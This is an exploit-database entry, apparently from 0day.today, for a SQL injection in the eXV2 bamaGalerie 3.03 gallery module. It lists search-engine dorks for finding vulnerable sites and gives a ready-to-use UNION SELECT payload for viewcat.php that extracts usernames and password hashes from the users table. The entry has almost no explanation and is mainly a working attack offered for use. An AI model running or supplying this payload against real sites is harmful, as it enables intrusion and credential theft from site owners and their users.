id: 2734
date: 03/12/2008
title: eXV2 Module bamaGalerie 3.03 Remote SQL Injection Vulnerability
author: S@BUN
cves: 

===============================================================
eXV2 Module bamaGalerie 3.03 Remote SQL Injection Vulnerability
===============================================================



##########################################
#
# eXV2 Module bamaGalerie 3.03 SQL Injection
#
###########################################
#
# DORKS 1 : allinurl :"modules/bamagalerie3"
# DORKS 2 : allinurl :"modules/bamagalerie"
#
###########################################
EXPLOIT :

viewcat.php?cid=-9999999/**/union/**/select/**/0,1,2,3,concat(uname,0x3a,pass),5,6/**/from/**/e_xoops_users/*



#  0day.today [2023-03-24]  #